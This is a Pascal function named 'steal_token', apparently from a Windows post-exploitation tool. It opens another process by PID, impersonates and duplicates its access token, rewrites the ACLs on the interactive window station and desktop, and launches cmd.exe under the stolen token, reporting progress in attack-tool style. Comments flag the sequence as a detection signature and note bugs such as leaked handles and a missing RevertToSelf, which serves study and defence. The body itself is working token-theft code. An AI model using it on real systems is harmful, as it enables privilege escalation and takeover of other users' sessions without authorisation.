// Opens the process identified by pid, takes its access token and uses a
// primary duplicate of it to launch cmd.exe on the interactive desktop
// (winsta0\default). Returns a multi-line status string (logger) describing
// how far each step got; several failures raise an Exception instead.
// Defender note: the sequence in this body — enabling SeDebugPrivilege on the
// caller, OpenProcess/OpenProcessToken on another PID, ACE changes on WinSta0
// and its default desktop, ImpersonateLoggedOnUser, DuplicateTokenEx and
// CreateProcessWithTokenW spawning cmd.exe — is the classic token-theft
// pattern; each step is an auditable API call and the chain is a good
// detection signature.
function steal_token(pid:Dword):string;
const
// dwLogonFlags value passed to CreateProcessWithTokenW below
LOGON_WITH_PROFILE = $00000001;
var
hproc,tokenhandle,hProcessToken,duplicateTokenHandle,currenttokenHandle : Thandle;
gettoken,impersonateUser,createProcess,duplicateToken,getcurrenttoken,isokay:boolean;
si: TStartupInfow;
pi: TPROCESSINFORMATION;
// SA and tkp (and hProcessToken, createProcess) are declared but never used below
SA: TSecurityAttributes;
tkp: TOKEN_PRIVILEGES;
logger :string;
hdesktop: HDESK;
hwinst, hwinstSave: HWINSTA;
S, DeskTopName, WinStaName: string;
//token_user : TOKEN_USER;
begin
hdesktop := 0;
hwinst := 0;
hwinstSave := 0;
// pS is not declared in this var block; presumably a unit-level PSID — confirm
pS := nil;
gettoken := false;
duplicateToken := false;
tokenhandle := 0;
duplicateTokenHandle := 0;
currenttokenHandle := 0;
hproc := 0;
//ZeroMemory(@si, SizeOf(si));
//ZeroMemory(@pi, SizeOf(pi));
// Open our own token for privilege adjustment; the result flag is stored but never checked
getcurrenttoken := OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES, currenttokenHandle);
// NTSetPrivilege is a helper defined elsewhere (not on this page); its return value is ignored,
// so a failure to enable SeDebugPrivilege only shows up later as OpenProcess failing
NTSetPrivilege(SE_DEBUG_NAME,true,currenttokenHandle);
// hproc is never closed in this function (handle leak); a 0 handle is passed straight on
hproc := OpenProcess(MAXIMUM_ALLOWED, true, pid);
getToken := OpenProcessToken(hproc, TOKEN_IMPERSONATE or TOKEN_DUPLICATE or TOKEN_ASSIGN_PRIMARY or TOKEN_QUERY, tokenHandle);
// Note: #10#13 is LF then CR, not the conventional CRLF (#13#10); cosmetic only
if (gettoken = true) then
logger := '[+] getting the token successfully'#10#13
else
logger := '[x] operation denied'#10;
// Remember the current window station so it can be restored after the ACE work below
hwinstSave := GetProcessWindowStation;
hwinst := OpenWindowStation('WinSta0', False, READ_CONTROL or WRITE_DAC);
// In each of the error blocks below the Exit after raise is unreachable — raise already leaves the function
if not SetProcessWindowStation(hwinst) then
begin
raise exception.create(Format('SetProcessWindowStation(hwinst): %s', [SysErrorMessage(GetLastError)]));
Exit;
end;
hdesktop := OpenDesktop('default', 0, False, READ_CONTROL or WRITE_DAC or DESKTOP_WRITEOBJECTS or DESKTOP_READOBJECTS);
if hdesktop = 0 then
begin
raise exception.create(Format('OpenDesktop: %s', [SysErrorMessage(GetLastError)]));
Exit;
end;
if not SetProcessWindowStation(hwinstSave) then
begin
raise exception.create(Format('SetProcessWindowStation(hwinstSave): %s', [SysErrorMessage(GetLastError)]));
Exit;
end;
// perform impersonation with process token handle
// There is no matching RevertToSelf anywhere in this function, so on every
// path after this point (including the raises) the calling thread remains
// impersonating the target's security context when steal_token returns.
impersonateUser := ImpersonateLoggedOnUser(tokenHandle);
if (impersonateUser) then
logger += '[+] impersonation is okay'#10
else
logger += '[x] operation denied'#10;
// GetLogonSID / AddAceToWindowStation / AddAceToDesktop are helpers defined
// elsewhere (not on this page); presumably they grant the token's logon SID
// access to WinSta0 and its default desktop so the spawned process can
// attach to them — confirm against their definitions
if not GetLogonSID(tokenHandle, ps) then
begin
raise exception.create(Format('GetLogonSID: %s', [SysErrorMessage(GetLastError)]));
Exit;
end;
// writeln(sidtostr(ps));
if not AddAceToWindowStation(hwinst, pS) then
begin
raise exception.create(Format('AddAceToWindowStation: %s', [SysErrorMessage(GetLastError)]));
Exit;
end;
if not AddAceToDesktop(hdesktop, pS) then
begin
raise exception.create(Format('AddAceToDesktop: %s', [SysErrorMessage(GetLastError)]));
Exit;
end;
// Call DuplicateTokenEx(), print return code and error code
// Produces a primary token from the (possibly impersonation-level) source token.
// `&duplicateTokenHandle` is FPC identifier-escape syntax rather than address-of (@);
// this only compiles if the DuplicateTokenEx binding declares that argument as a var parameter — confirm
duplicateToken := DuplicateTokenEx(tokenHandle, TOKEN_ALL_ACCESS or TOKEN_ADJUST_DEFAULT or TOKEN_ADJUST_SESSIONID or TOKEN_QUERY or TOKEN_DUPLICATE or TOKEN_ASSIGN_PRIMARY, nil, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle);
if (duplicateToken = true) then
logger += '[!] duplicating token'#10
else
logger += '[x] operation denied'#10;
ZeroMemory(@si, SizeOf(si));
si.cb := SizeOf(si);
// Force the new process onto the interactive desktop whose ACLs were adjusted above
si.lpDesktop := PwideChar('winsta0\default');
// Call CreateProcessWithTokenW(), print return code and error code
// Hard-coded image path; pi.hProcess / pi.hThread and the token handles are never closed here
isokay := CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE,'c:\windows\system32\cmd.exe', nil, 0, nil, nil, @si, @pi);
if isokay then
logger += '{+} session opened successfully'#10#13
else
raise Exception.Create(SysErrorMessage(GetLastError));
// Only the success path reaches here; every earlier raise discards the partial logger text
result := logger;
end;